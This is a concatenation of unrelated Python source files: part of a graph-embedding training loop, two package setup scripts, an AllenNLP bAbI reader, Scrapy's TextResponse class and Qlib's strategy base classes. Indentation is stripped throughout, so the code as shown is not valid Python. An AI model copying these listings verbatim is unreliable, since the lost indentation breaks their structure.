iteration_idx=checkpoint_manager.checkpoint_version,
)
checkpoint_manager.register_metadata_provider(self.iteration_manager)
logger.info("Initializing global model...")
if model is None:
model = make_model(config)
model.share_memory()
loss_fn = LOSS_FUNCTIONS.get_class(config.loss_fn)(margin=config.margin)
relation_weights = [relation.weight for relation in config.relations]
if trainer is None:
trainer = Trainer(
model_optimizer=make_optimizer(config, model.parameters(), False),
loss_fn=loss_fn,
relation_weights=relation_weights,
)
if evaluator is None:
eval_overrides = {}
if config.eval_num_batch_negs is not None:
eval_overrides["num_batch_negs"] = config.eval_num_batch_negs
if config.eval_num_uniform_negs is not None:
eval_overrides["num_uniform_negs"] = config.eval_num_uniform_negs
evaluator = RankingEvaluator(
loss_fn=loss_fn,
relation_weights=relation_weights,
overrides=eval_overrides,
)
if config.init_path is not None:
self.loadpath_manager = CheckpointManager(config.init_path)
else:
self.loadpath_manager = None
# load model from checkpoint or loadpath, if available
state_dict, optim_state = checkpoint_manager.maybe_read_model()
if state_dict is None and self.loadpath_manager is not None:
state_dict, optim_state = self.loadpath_manager.maybe_read_model()
if state_dict is not None:
model.load_state_dict(state_dict, strict=False)
if optim_state is not None:
trainer.model_optimizer.load_state_dict(optim_state)
logger.debug("Loading unpartitioned entities...")
for entity in holder.lhs_unpartitioned_types | holder.rhs_unpartitioned_types:
count = entity_counts[entity][0]
s = embedding_storage_freelist[entity].pop()
dimension = config.entity_dimension(entity)
embs = torch.FloatTensor(s).view(-1, dimension)[:count]
embs, optimizer = self._load_embeddings(entity, UNPARTITIONED, out=embs)
holder.unpartitioned_embeddings[entity] = embs
trainer.unpartitioned_optimizers[entity] = optimizer
# start communicating shared parameters with the parameter server
if parameter_sharer is not None:
shared_parameters: Set[int] = set()
for name, param in model.named_parameters():
if id(param) in shared_parameters:
continue
shared_parameters.add(id(param))
key = f"model.{name}"
logger.info(
f"Adding {key} ({param.numel()} params) to parameter server"
)
parameter_sharer.set_param(key, param.data)
for entity, embs in holder.unpartitioned_embeddings.items():
key = f"entity.{entity}"
logger.info(f"Adding {key} ({embs.numel()} params) to parameter server")
parameter_sharer.set_param(key, embs.data)
# store everything in self
self.model = model
self.trainer = trainer
self.evaluator = evaluator
self.rank = rank
self.entity_counts = entity_counts
self.embedding_storage_freelist = embedding_storage_freelist
self.stats_handler = stats_handler
self.strict = False
def train(self) -> None:
holder = self.holder
config = self.config
iteration_manager = self.iteration_manager
total_buckets = holder.nparts_lhs * holder.nparts_rhs
# yield stats from checkpoint, to reconstruct
# saved part of the learning curve
if self.rank == SINGLE_TRAINER:
for stats_dict in self.checkpoint_manager.maybe_read_stats():
index: int = stats_dict["index"]
stats: Optional[Stats] = None
if "stats" in stats_dict:
stats: Stats = Stats.from_dict(stats_dict["stats"])
eval_stats_before: Optional[Stats] = None
if "eval_stats_before" in stats_dict:
eval_stats_before = Stats.from_dict(stats_dict["eval_stats_before"])
eval_stats_after: Optional[Stats] = None
if "eval_stats_after" in stats_dict:
eval_stats_after = Stats.from_dict(stats_dict["eval_stats_after"])
eval_stats_chunk_avg: Optional[Stats] = None
if "eval_stats_chunk_avg" in stats_dict:
eval_stats_chunk_avg = Stats.from_dict(
stats_dict["eval_stats_chunk_avg"]
)
self.stats_handler.on_stats(
index,
eval_stats_before,
stats,
eval_stats_after,
eval_stats_chunk_avg,
)
for epoch_idx, edge_path_idx, edge_chunk_idx in iteration_manager:
logger.info(
f"Starting epoch {epoch_idx + 1} / {iteration_manager.num_epochs}, "
f"edge path {edge_path_idx + 1} / {iteration_manager.num_edge_paths}, "
f"edge chunk {edge_chunk_idx + 1} / {iteration_manager.num_edge_chunks}"
)
edge_storage = EDGE_STORAGES.make_instance(iteration_manager.edge_path)
logger.info(f"Edge path: {iteration_manager.edge_path}")
self._barrier()
dist_logger.info("Lock client new epoch...")
self.bucket_scheduler.new_pass(
is_first=iteration_manager.iteration_idx == 0
)
self._barrier()
remaining = total_buckets
cur_b: Optional[Bucket] = None
cur_stats: Optional[BucketStats] = None
while remaining > 0:
old_b: Optional[Bucket] = cur_b
old_stats: Optional[BucketStats] = cur_stats
cur_b, remaining = self.bucket_scheduler.acquire_bucket()
logger.info(f"still in queue: {remaining}")
if cur_b is None:
cur_stats = None
if old_b is not None:
# if you couldn't get a new pair, release the lock
# to prevent a deadlock!
tic = time.perf_counter()
release_bytes = self._swap_partitioned_embeddings(
old_b, None, old_stats
)
release_time = time.perf_counter() - tic
logger.info(
f"Swapping old embeddings to release lock. io: {release_time:.2f} s for {release_bytes:,} bytes "
f"( {release_bytes / release_time / 1e6:.2f} MB/sec )"
)
time.sleep(1) # don't hammer td
continue
tic = time.perf_counter()
self.cur_b = cur_b
bucket_logger = BucketLogger(logger, bucket=cur_b)
self.bucket_logger = bucket_logger
io_bytes = self._swap_partitioned_embeddings(old_b, cur_b, old_stats)
self.model.set_all_embeddings(holder, cur_b)
current_index = (
iteration_manager.iteration_idx + 1
) * total_buckets - remaining
bucket_logger.debug("Loading edges")
edges = edge_storage.load_chunk_of_edges(
cur_b.lhs,
cur_b.rhs,
edge_chunk_idx,
iteration_manager.num_edge_chunks,
shared=True,
)
num_edges = len(edges)
# this might be off in the case of tensorlist or extra edge fields
io_bytes += edges.lhs.tensor.numel() * edges.lhs.tensor.element_size()
io_bytes += edges.rhs.tensor.numel() * edges.rhs.tensor.element_size()
io_bytes += edges.rel.numel() * edges.rel.element_size()
io_time = time.perf_counter() - tic
tic = time.perf_counter()
bucket_logger.debug("Shuffling edges")
# Fix a seed to get the same permutation every time; have it
# depend on all and only what affects the set of edges.
# Note: for the sake of efficiency, we sample eval edge idxs
# from the edge set *with replacement*, meaning that there may
# be duplicates of the same edge in the eval set. When we swap
# edges into the eval set, if there are duplicates then all
# but one will be clobbered. These collisions are unlikely
# if eval_fraction is small.
#
# Importantly, this eval sampling strategy is theoretically
# sound:
# * Training and eval sets are (exactly) disjoint
# * Eval set may have (rare) duplicates, but they are
# uniformly sampled so it's still an unbiased estimator
# of the out-of-sample statistics
num_eval_edges = int(num_edges * config.eval_fraction)
num_train_edges = num_edges - num_eval_edges
if num_eval_edges > 0:
g = torch.Generator()
g.manual_seed(
hash((edge_path_idx, edge_chunk_idx, cur_b.lhs, cur_b.rhs))
)
eval_edge_idxs = torch.randint(
num_edges, (num_eval_edges,), dtype=torch.long, generator=g
)
else:
eval_edge_idxs = None
# HOGWILD evaluation before training
eval_stats_before = self._coordinate_eval(edges, eval_edge_idxs)
if eval_stats_before is not None:
bucket_logger.info(f"Stats before training: {eval_stats_before}")
eval_time = time.perf_counter() - tic
tic = time.perf_counter()
# HOGWILD training
bucket_logger.debug("Waiting for workers to perform training")
stats = self._coordinate_train(edges, eval_edge_idxs, epoch_idx)
if stats is not None:
bucket_logger.info(f"Training stats: {stats}")
train_time = time.perf_counter() - tic
tic = time.perf_counter()
# HOGWILD evaluation after training
eval_stats_after = self._coordinate_eval(edges, eval_edge_idxs)
if eval_stats_after is not None:
bucket_logger.info(f"Stats after training: {eval_stats_after}")
eval_time += time.perf_counter() - tic
bucket_logger.info(
f"bucket {total_buckets - remaining} / {total_buckets} : "
f"Trained {num_train_edges} edges in {train_time:.2f} s "
f"( {num_train_edges / train_time / 1e6:.2g} M/sec ); "
f"Eval 2*{num_eval_edges} edges in {eval_time:.2f} s "
f"( {2 * num_eval_edges / eval_time / 1e6:.2g} M/sec ); "
f"io: {io_time:.2f} s for {io_bytes:,} bytes ( {io_bytes / io_time / 1e6:.2f} MB/sec )"
)
self.model.clear_all_embeddings()
cur_stats = BucketStats(
lhs_partition=cur_b.lhs,
rhs_partition=cur_b.rhs,
index=current_index,
train=stats,
eval_before=eval_stats_before,
eval_after=eval_stats_after,
)
# release the final bucket
self._swap_partitioned_embeddings(cur_b, None, cur_stats)
# Distributed Processing: all machines can leave the barrier now.
self._barrier()
current_index = (iteration_manager.iteration_idx + 1) * total_buckets - 1
self._maybe_write_checkpoint(
epoch_idx, edge_path_idx, edge_chunk_idx, current_index
)
# now we're sure that all partition files exist,
# so be strict about loading them
self.strict = True
def close(self):
# cleanup
self.pool.close()
self.pool.join()
self._barrier()
self.checkpoint_manager.close()
if self.loadpath_manager is not None:
self.loadpath_manager.close()
# FIXME join distributed workers (not really necessary)
logger.info("Exiting")
###########################################################################
# private functions
###########################################################################
def _barrier(self) -> None:
if self.barrier_group is not None:
td.barrier(group=self.barrier_group)
def _load_embeddings(
self,
entity: EntityName,
part: Partition,
out: FloatTensorType,
strict: bool = False,
force_dirty: bool = False,
) -> Tuple[torch.nn.Parameter, Optimizer]:
if strict:
embs, optim_state = self.checkpoint_manager.read(
entity, part, out=out, force_dirty=force_dirty
)
else:
# Strict is only false during the first iteration, because in that
# case the checkpoint may not contain any data (unless a previous
# run was resumed) so we fall back on initial values.
embs, optim_state = self.checkpoint_manager.maybe_read(
entity, part, out=out, force_dirty=force_dirty
)
if embs is None and self.loadpath_manager is not None:
embs, optim_state = self.loadpath_manager.maybe_read(
entity, part, out=out
)
if embs is None:
embs = out
fast_approx_rand(embs)
embs.mul_(self.config.init_scale)
optim_state = None
embs = torch.nn.Parameter(embs)
optimizer = make_optimizer(self.config, [embs], True)
if optim_state is not None:
optimizer.load_state_dict(optim_state)
return embs, optimizer
def _swap_partitioned_embeddings(
self,
old_b: Optional[Bucket],
new_b: Optional[Bucket],
old_stats: Optional[BucketStats],
) -> int:
io_bytes = 0
logger.info(f"Swapping partitioned embeddings {old_b} {new_b}")
holder = self.holder
old_parts: Set[Tuple[EntityName, Partition]] = set()
if old_b is not None:
old_parts.update((e, old_b.lhs) for e in holder.lhs_partitioned_types)
old_parts.update((e, old_b.rhs) for e in holder.rhs_partitioned_types)
new_parts: Set[Tuple[EntityName, Partition]] = set()
if new_b is not None:
new_parts.update((e, new_b.lhs) for e in holder.lhs_partitioned_types)
new_parts.update((e, new_b.rhs) for e in holder.rhs_partitioned_types)
assert old_parts == holder.partitioned_embeddings.keys()
if old_b is not None:
if old_stats is None:
raise TypeError("Got old bucket but not its stats")
logger.info("Saving partitioned embeddings to checkpoint")
for entity, part in old_parts - new_parts:
logger.debug(f"Saving ({entity} {part})")
embs = holder.partitioned_embeddings.pop((entity, part))
optimizer = self.trainer.partitioned_optimizers.pop((entity, part))
self.checkpoint_manager.write(
entity, part, embs.detach(), optimizer.state_dict()
)
self.embedding_storage_freelist[entity].add(embs.storage())
io_bytes += embs.numel() * embs.element_size() # ignore optim state
# these variables are holding large objects; let them be freed
del embs
del optimizer
self.bucket_scheduler.release_bucket(old_b, old_stats)
if new_b is not None:
logger.info("Loading partitioned embeddings from checkpoint")
for entity, part in new_parts - old_parts:
logger.debug(f"Loading ({entity} {part})")
force_dirty = self.bucket_scheduler.check_and_set_dirty(entity, part)
count = self.entity_counts[entity][part]
s = self.embedding_storage_freelist[entity].pop()
dimension = self.config.entity_dimension(entity)
embs = torch.FloatTensor(s).view(-1, dimension)[:count]
embs, optimizer = self._load_embeddings(
entity, part, out=embs, strict=self.strict, force_dirty=force_dirty
)
holder.partitioned_embeddings[entity, part] = embs
self.trainer.partitioned_optimizers[entity, part] = optimizer
io_bytes += embs.numel() * embs.element_size() # ignore optim state
assert new_parts == holder.partitioned_embeddings.keys()
return io_bytes
def _coordinate_train(self, edges, eval_edge_idxs, epoch_idx) -> Stats:
assert self.config.num_gpus == 0, "GPU training not supported"
if eval_edge_idxs is not None:
num_train_edges = len(edges) - len(eval_edge_idxs)
train_edge_idxs = torch.arange(len(edges))
train_edge_idxs[eval_edge_idxs] = torch.arange(num_train_edges, len(edges))
train_edge_idxs = train_edge_idxs[:num_train_edges]
edge_perm = train_edge_idxs[torch.randperm(num_train_edges)]
else:
edge_perm = torch.randperm(len(edges))
future_all_stats = self.pool.map_async(
call,
[
partial(
process_in_batches,
batch_size=self.config.batch_size,
model=self.model,
batch_processor=self.trainer,
edges=edges,
indices=edge_perm[s],
# FIXME should we only delay if iteration_idx == 0?
delay=self.config.hogwild_delay
if epoch_idx == 0 and self.rank > 0
else 0,
)
for rank, s in enumerate(
split_almost_equally(edge_perm.size(0), num_parts=self.num_workers)
)
],
)
all_stats = get_async_result(future_all_stats, self.pool)
return Stats.sum(all_stats).average()
def _coordinate_eval(self, edges, eval_edge_idxs) -> Optional[Stats]:
eval_batch_size = round_up_to_nearest_multiple(
self.config.batch_size, self.config.eval_num_batch_negs
)
if eval_edge_idxs is not None:
self.bucket_logger.debug("Waiting for workers to perform evaluation")
future_all_eval_stats = self.pool.map_async(
call,
[
partial(
process_in_batches,
batch_size=eval_batch_size,
model=self.model,
batch_processor=self.evaluator,
edges=edges,
indices=eval_edge_idxs[s],
)
for s in split_almost_equally(
eval_edge_idxs.size(0), num_parts=self.num_workers
)
],
)
all_eval_stats = get_async_result(future_all_eval_stats, self.pool)
return Stats.sum(all_eval_stats).average()
else:
return None
def _maybe_write_checkpoint(
self,
epoch_idx: int,
edge_path_idx: int,
edge_chunk_idx: int,
current_index: int,
) -> None:
config = self.config
# Preserving a checkpoint requires two steps:
# - create a snapshot (w/ symlinks) after it's first written;
# - don't delete it once the following one is written.
# These two happen in two successive iterations of the main loop: the
# one just before and the one just after the epoch boundary.
preserve_old_checkpoint = should_preserve_old_checkpoint(
self.iteration_manager, config.checkpoint_preservation_interval
)
preserve_new_checkpoint = should_preserve_old_checkpoint(
self.iteration_manager + 1, config.checkpoint_preservation_interval
)
# Write metadata: for multiple machines, write from rank-0
logger.info(
f"Finished epoch {epoch_idx + 1} / {self.iteration_manager.num_epochs}, "
f"edge path {edge_path_idx + 1} / {self.iteration_manager.num_edge_paths}, "
f"edge chunk {edge_chunk_idx + 1} / "
f"{self.iteration_manager.num_edge_chunks}"
)
if self.rank == 0:
for entity, embs in self.holder.unpartitioned_embeddings.items():
logger.info(f"Writing {entity} embeddings")
optimizer = self.trainer.unpartitioned_optimizers[entity]
self.checkpoint_manager.write(
entity,
UNPARTITIONED,
embs.detach(),
optimizer.state_dict(),
unpartitioned=True,
)
logger.info("Writing the metadata")
state_dict: ModuleStateDict = self.model.state_dict()
self.checkpoint_manager.write_model(
state_dict, self.trainer.model_optimizer.state_dict()
)
logger.info("Writing the training stats")
all_stats_dicts: List[Dict[str, Any]] = []
bucket_eval_stats_list = []
chunk_stats_dict = {
"epoch_idx": epoch_idx,
"edge_path_idx": edge_path_idx,
"edge_chunk_idx": edge_chunk_idx,
}
for stats in self.bucket_scheduler.get_stats_for_pass():
stats_dict = {
"lhs_partition": stats.lhs_partition,
"rhs_partition": stats.rhs_partition,
"index": stats.index,
"stats": stats.train.to_dict(),
}
if stats.eval_before is not None:
stats_dict["eval_stats_before"] = stats.eval_before.to_dict()
bucket_eval_stats_list.append(stats.eval_before)
if stats.eval_after is not None:
stats_dict["eval_stats_after"] = stats.eval_after.to_dict()
stats_dict.update(chunk_stats_dict)
all_stats_dicts.append(stats_dict)
if len(bucket_eval_stats_list) != 0:
eval_stats_chunk_avg = Stats.average_list(bucket_eval_stats_list)
self.stats_handler.on_stats(
index=current_index, eval_stats_chunk_avg=eval_stats_chunk_avg
)
chunk_stats_dict["index"] = current_index
chunk_stats_dict[
"eval_stats_chunk_avg"
] = eval_stats_chunk_avg.to_dict()
all_stats_dicts.append(chunk_stats_dict)
self.checkpoint_manager.append_stats(all_stats_dicts)
logger.info("Writing the checkpoint")
self.checkpoint_manager.write_new_version(
config, self.entity_counts, self.embedding_storage_freelist
)
dist_logger.info(
"Waiting for other workers to write their parts of the checkpoint"
)
self._barrier()
dist_logger.info("All parts of the checkpoint have been written")
logger.info("Switching to the new checkpoint version")
self.checkpoint_manager.switch_to_new_version()
dist_logger.info(
"Waiting for other workers to switch to the new checkpoint version"
)
self._barrier()
dist_logger.info("All workers have switched to the new checkpoint version")
# After all the machines have finished committing
# checkpoints, we either remove the old checkpoints
# or we preserve it
if preserve_new_checkpoint:
# Add 1 so the index is a multiple of the interval, it looks nicer.
self.checkpoint_manager.preserve_current_version(config, epoch_idx + 1)
if not preserve_old_checkpoint:
self.checkpoint_manager.remove_old_version(config)
|
from setuptools import setup, find_packages
with open("requirements.txt") as f:
required = f.read().splitlines()
setup(
name="icloudpd",
version="1.4.3",
url="https://github.com/ndbroadbent/icloud_photos_downloader",
description=(
"icloudpd is a command-line tool to download photos and videos from iCloud."
),
maintainer="Nathan Broadbent",
maintainer_email="icloudpd@ndbroadbent.com",
license="MIT",
packages=find_packages(),
install_requires=required,
classifiers=[
"Intended Audience :: Developers",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
],
entry_points={"console_scripts": ["icloudpd = icloudpd.base:main"]},
)
|
# -*- coding: utf-8 -*-
import setuptools
import khorosjx.utils.version
with open("README.md", "r") as fh:
long_description = fh.read()
version = khorosjx.utils.version.__version__
setuptools.setup(
name="khorosjx",
version=version,
author="Jeff Shurtliff",
author_email="jeff.shurtliff@rsa.com",
description="Useful tools and utilities to assist in managing a Khoros JX (formerly Jive-x) or Jive-n community.",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/jeffshurtliff/khorosjx",
packages=setuptools.find_packages(),
classifiers=[
"Development Status :: 5 - Production/Stable",
"Environment :: Web Environment",
"Intended Audience :: Information Technology",
"Intended Audience :: System Administrators",
"License :: OSI Approved :: MIT License",
"Natural Language :: English",
"Operating System :: OS Independent",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Topic :: Communications",
"Topic :: Internet :: WWW/HTTP :: Dynamic Content :: Content Management System",
"Topic :: Internet :: WWW/HTTP :: Dynamic Content :: Message Boards",
"Topic :: Internet :: WWW/HTTP :: Site Management"
],
python_requires='>=3.6',
install_requires=[
"PyYAML>=5.4.1",
"urllib3>=1.26.6",
"requests>=2.26.0",
"pandas>=1.3.3",
"python-dateutil>=2.8.2",
],
)
|
import logging
from typing import Dict, List
from overrides import overrides
from allennlp.common.file_utils import cached_path
from allennlp.data.dataset_readers.dataset_reader import DatasetReader
from allennlp.data.instance import Instance
from allennlp.data.fields import Field, TextField, ListField, IndexField
from allennlp.data.token_indexers import TokenIndexer, SingleIdTokenIndexer
from allennlp.data.tokenizers import Token
logger = logging.getLogger(__name__)
@DatasetReader.register("babi")
class BabiReader(DatasetReader):
"""
Reads one single task in the bAbI tasks format as formulated in
Towards AI-Complete Question Answering: A Set of Prerequisite Toy Tasks
(https://arxiv.org/abs/1502.05698). Since this class handle a single file,
if one wants to load multiple tasks together it has to merge them into a
single file and use this reader.
# Parameters
keep_sentences : `bool`, optional, (default = `False`)
Whether to keep each sentence in the context or to concatenate them.
Default is `False` that corresponds to concatenation.
token_indexers : `Dict[str, TokenIndexer]`, optional (default=`{"tokens": SingleIdTokenIndexer()}`)
We use this to define the input representation for the text. See :class:`TokenIndexer`.
"""
def __init__(
self,
keep_sentences: bool = False,
token_indexers: Dict[str, TokenIndexer] = None,
**kwargs,
) -> None:
super().__init__(**kwargs)
self._keep_sentences = keep_sentences
self._token_indexers = token_indexers or {"tokens": SingleIdTokenIndexer()}
@overrides
def _read(self, file_path: str):
# if `file_path` is a URL, redirect to the cache
file_path = cached_path(file_path)
logger.info("Reading file at %s", file_path)
with open(file_path) as dataset_file:
dataset = dataset_file.readlines()
logger.info("Reading the dataset")
context: List[List[str]] = [[]]
for line in dataset:
if "?" in line:
question_str, answer, supports_str = line.replace("?", " ?").split("\t")
question = question_str.split()[1:]
supports = [int(support) - 1 for support in supports_str.split()]
yield self.text_to_instance(context, question, answer, supports)
else:
new_entry = line.replace(".", " .").split()[1:]
if line[0] == "1":
context = [new_entry]
else:
context.append(new_entry)
@overrides
def text_to_instance(
self, # type: ignore
context: List[List[str]],
question: List[str],
answer: str,
supports: List[int],
) -> Instance:
fields: Dict[str, Field] = {}
if self._keep_sentences:
context_field_ks = ListField(
[
TextField([Token(word) for word in line], self._token_indexers)
for line in context
]
)
fields["supports"] = ListField(
[IndexField(support, context_field_ks) for support in supports]
)
else:
context_field = TextField(
[Token(word) for line in context for word in line], self._token_indexers
)
fields["context"] = context_field_ks if self._keep_sentences else context_field
fields["question"] = TextField([Token(word) for word in question], self._token_indexers)
fields["answer"] = TextField([Token(answer)], self._token_indexers)
return Instance(fields)
|
"""
This module implements the TextResponse class which adds encoding handling and
discovering (through HTTP headers) to base Response class.
See documentation in docs/topics/request-response.rst
"""
import re
import codecs
from scrapy.xlib.BeautifulSoup import UnicodeDammit
from scrapy.http.response import Response
from scrapy.utils.python import memoizemethod_noargs
from scrapy.utils.encoding import encoding_exists, resolve_encoding
from scrapy.conf import settings
# Python decoder doesn't follow unicode standard when handling
# bad utf-8 encoded strings. see http://bugs.python.org/issue8271
codecs.register_error('scrapy_replace', lambda exc: (u'\ufffd', exc.start+1))
class TextResponse(Response):
_DEFAULT_ENCODING = settings['DEFAULT_RESPONSE_ENCODING']
_ENCODING_RE = re.compile(r'charset=([\w-]+)', re.I)
__slots__ = ['_encoding', '_cached_benc', '_cached_ubody']
def __init__(self, *args, **kwargs):
self._encoding = kwargs.pop('encoding', None)
self._cached_benc = None
self._cached_ubody = None
super(TextResponse, self).__init__(*args, **kwargs)
def _set_url(self, url):
if isinstance(url, unicode):
if self.encoding is None:
raise TypeError('Cannot convert unicode url - %s has no encoding' %
type(self).__name__)
self._url = url.encode(self.encoding)
else:
super(TextResponse, self)._set_url(url)
def _set_body(self, body):
self._body = ''
if isinstance(body, unicode):
if self.encoding is None:
raise TypeError('Cannot convert unicode body - %s has no encoding' %
type(self).__name__)
self._body = body.encode(self._encoding)
else:
super(TextResponse, self)._set_body(body)
def replace(self, *args, **kwargs):
kwargs.setdefault('encoding', self.encoding)
return Response.replace(self, *args, **kwargs)
@property
def encoding(self):
return self._get_encoding(infer=True)
def _get_encoding(self, infer=False):
enc = self._declared_encoding()
if enc and not encoding_exists(enc):
enc = None
if not enc and infer:
enc = self._body_inferred_encoding()
if not enc:
enc = self._DEFAULT_ENCODING
return resolve_encoding(enc)
def _declared_encoding(self):
return self._encoding or self._headers_encoding() \
or self._body_declared_encoding()
def body_as_unicode(self):
"""Return body as unicode"""
if self._cached_ubody is None:
self._cached_ubody = self.body.decode(self.encoding, 'scrapy_replace')
return self._cached_ubody
@memoizemethod_noargs
def _headers_encoding(self):
content_type = self.headers.get('Content-Type')
if content_type:
m = self._ENCODING_RE.search(content_type)
if m:
encoding = m.group(1)
if encoding_exists(encoding):
return encoding
def _body_inferred_encoding(self):
if self._cached_benc is None:
enc = self._get_encoding()
dammit = UnicodeDammit(self.body, [enc])
benc = dammit.originalEncoding
self._cached_benc = benc
# UnicodeDammit is buggy decoding utf-16
if self._cached_ubody is None and benc != 'utf-16':
self._cached_ubody = dammit.unicode
return self._cached_benc
def _body_declared_encoding(self):
# implemented in subclasses (XmlResponse, HtmlResponse)
return None
|
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
from __future__ import annotations
from typing import TYPE_CHECKING
if TYPE_CHECKING:
from qlib.backtest.exchange import Exchange
from qlib.backtest.position import BasePosition
from typing import List, Tuple, Union
from ..model.base import BaseModel
from ..data.dataset import DatasetH
from ..data.dataset.utils import convert_index_format
from ..rl.interpreter import ActionInterpreter, StateInterpreter
from ..utils import init_instance_by_config
from ..backtest.utils import CommonInfrastructure, LevelInfrastructure, TradeCalendarManager
from ..backtest.decision import BaseTradeDecision
__all__ = ["BaseStrategy", "ModelStrategy", "RLStrategy", "RLIntStrategy"]
class BaseStrategy:
"""Base strategy for trading"""
def __init__(
self,
outer_trade_decision: BaseTradeDecision = None,
level_infra: LevelInfrastructure = None,
common_infra: CommonInfrastructure = None,
trade_exchange: Exchange = None,
):
"""
Parameters
----------
outer_trade_decision : BaseTradeDecision, optional
the trade decision of outer strategy which this startegy relies, and it will be traded in [start_time, end_time], by default None
- If the strategy is used to split trade decision, it will be used
- If the strategy is used for portfolio management, it can be ignored
level_infra : LevelInfrastructure, optional
level shared infrastructure for backtesting, including trade calendar
common_infra : CommonInfrastructure, optional
common infrastructure for backtesting, including trade_account, trade_exchange, .etc
trade_exchange : Exchange
exchange that provides market info, used to deal order and generate report
- If `trade_exchange` is None, self.trade_exchange will be set with common_infra
- It allowes different trade_exchanges is used in different executions.
- For example:
- In daily execution, both daily exchange and minutely are usable, but the daily exchange is recommended because it run faster.
- In minutely execution, the daily exchange is not usable, only the minutely exchange is recommended.
"""
self._reset(level_infra=level_infra, common_infra=common_infra, outer_trade_decision=outer_trade_decision)
self._trade_exchange = trade_exchange
@property
def trade_calendar(self) -> TradeCalendarManager:
return self.level_infra.get("trade_calendar")
@property
def trade_position(self) -> BasePosition:
return self.common_infra.get("trade_account").current_position
@property
def trade_exchange(self) -> Exchange:
"""get trade exchange in a prioritized order"""
return getattr(self, "_trade_exchange", None) or self.common_infra.get("trade_exchange")
def reset_level_infra(self, level_infra: LevelInfrastructure):
if not hasattr(self, "level_infra"):
self.level_infra = level_infra
else:
self.level_infra.update(level_infra)
def reset_common_infra(self, common_infra: CommonInfrastructure):
if not hasattr(self, "common_infra"):
self.common_infra: CommonInfrastructure = common_infra
else:
self.common_infra.update(common_infra)
def reset(
self,
level_infra: LevelInfrastructure = None,
common_infra: CommonInfrastructure = None,
outer_trade_decision=None,
**kwargs,
):
"""
- reset `level_infra`, used to reset trade calendar, .etc
- reset `common_infra`, used to reset `trade_account`, `trade_exchange`, .etc
- reset `outer_trade_decision`, used to make split decision
**NOTE**:
split this function into `reset` and `_reset` will make following cases more convenient
1. Users want to initialize his strategy by overriding `reset`, but they don't want to affect the `_reset` called
when initialization
"""
self._reset(
level_infra=level_infra, common_infra=common_infra, outer_trade_decision=outer_trade_decision, **kwargs
)
def _reset(
self,
level_infra: LevelInfrastructure = None,
common_infra: CommonInfrastructure = None,
outer_trade_decision=None,
):
"""
Please refer to the docs of `reset`
"""
if level_infra is not None:
self.reset_level_infra(level_infra)
if common_infra is not None:
self.reset_common_infra(common_infra)
if outer_trade_decision is not None:
self.outer_trade_decision = outer_trade_decision
def generate_trade_decision(self, execute_result=None):
"""Generate trade decision in each trading bar
Parameters
----------
execute_result : List[object], optional
the executed result for trade decision, by default None
- When call the generate_trade_decision firstly, `execute_result` could be None
"""
raise NotImplementedError("generate_trade_decision is not implemented!")
def update_trade_decision(
self, trade_decision: BaseTradeDecision, trade_calendar: TradeCalendarManager
) -> Union[BaseTradeDecision, None]:
"""
update trade decision in each step of inner execution, this method enable all order
Parameters
----------
trade_decision : BaseTradeDecision
the trade decision that will be updated
trade_calendar : TradeCalendarManager
The calendar of the **inner strategy**!!!!!
Returns
-------
BaseTradeDecision:
"""
# default to return None, which indicates that the trade decision is not changed
return None
def alter_outer_trade_decision(self, outer_trade_decision: BaseTradeDecision):
"""
A method for updating the outer_trade_decision.
The outer strategy may change its decision during updating.
Parameters
----------
outer_trade_decision : BaseTradeDecision
the decision updated by the outer strategy
"""
# default to reset the decision directly
# NOTE: normally, user should do something to the strategy due to the change of outer decision
raise NotImplementedError(f"Please implement the `alter_outer_trade_decision` method")
# helper methods: not necessary but for convenience
def get_data_cal_avail_range(self, rtype: str = "full") -> Tuple[int, int]:
"""
return data calendar's available decision range for `self` strategy
the range consider following factors
- data calendar in the charge of `self` strategy
- trading range limitation from the decision of outer strategy
related methods
- TradeCalendarManager.get_data_cal_range
- BaseTradeDecision.get_data_cal_range_limit
Parameters
----------
rtype: str
- "full": return the available data index range of the strategy from `start_time` to `end_time`
- "step": return the available data index range of the strategy of current step
Returns
-------
Tuple[int, int]:
the available range both sides are closed
"""
cal_range = self.trade_calendar.get_data_cal_range(rtype=rtype)
if self.outer_trade_decision is None:
raise ValueError(f"There is not limitation for strategy {self}")
range_limit = self.outer_trade_decision.get_data_cal_range_limit(rtype=rtype)
return max(cal_range[0], range_limit[0]), min(cal_range[1], range_limit[1])
class ModelStrategy(BaseStrategy):
"""Model-based trading strategy, use model to make predictions for trading"""
def __init__(
self,
model: BaseModel,
dataset: DatasetH,
outer_trade_decision: BaseTradeDecision = None,
level_infra: LevelInfrastructure = None,
common_infra: CommonInfrastructure = None,
**kwargs,
):
"""
Parameters
----------
model : BaseModel
the model used in when making predictions
dataset : DatasetH
provide test data for model
kwargs : dict
arguments that will be passed into `reset` method
"""
super(ModelStrategy, self).__init__(outer_trade_decision, level_infra, common_infra, **kwargs)
self.model = model
self.dataset = dataset
self.pred_scores = convert_index_format(self.model.predict(dataset), level="datetime")
def _update_model(self):
"""
When using online data, pdate model in each bar as the following steps:
- update dataset with online data, the dataset should support online update
- make the latest prediction scores of the new bar
- update the pred score into the latest prediction
"""
raise NotImplementedError("_update_model is not implemented!")
class RLStrategy(BaseStrategy):
"""RL-based strategy"""
def __init__(
self,
policy,
outer_trade_decision: BaseTradeDecision = None,
level_infra: LevelInfrastructure = None,
common_infra: CommonInfrastructure = None,
**kwargs,
):
"""
Parameters
----------
policy :
RL policy for generate action
"""
super(RLStrategy, self).__init__(outer_trade_decision, level_infra, common_infra, **kwargs)
self.policy = policy
class RLIntStrategy(RLStrategy):
"""(RL)-based (Strategy) with (Int)erpreter"""
def __init__(
self,
policy,
state_interpreter: Union[dict, StateInterpreter],
action_interpreter: Union[dict, ActionInterpreter],
outer_trade_decision: BaseTradeDecision = None,
level_infra: LevelInfrastructure = None,
common_infra: CommonInfrastructure = None,
**kwargs,
):
"""
Parameters
----------
state_interpreter : Union[dict, StateInterpreter]
interpretor that interprets the qlib execute result into rl env state
action_interpreter : Union[dict, ActionInterpreter]
interpretor that interprets the rl agent action into qlib order list
start_time : Union[str, pd.Timestamp], optional
start time of trading, by default None
end_time : Union[str, pd.Timestamp], optional
end time of trading, by default None
"""
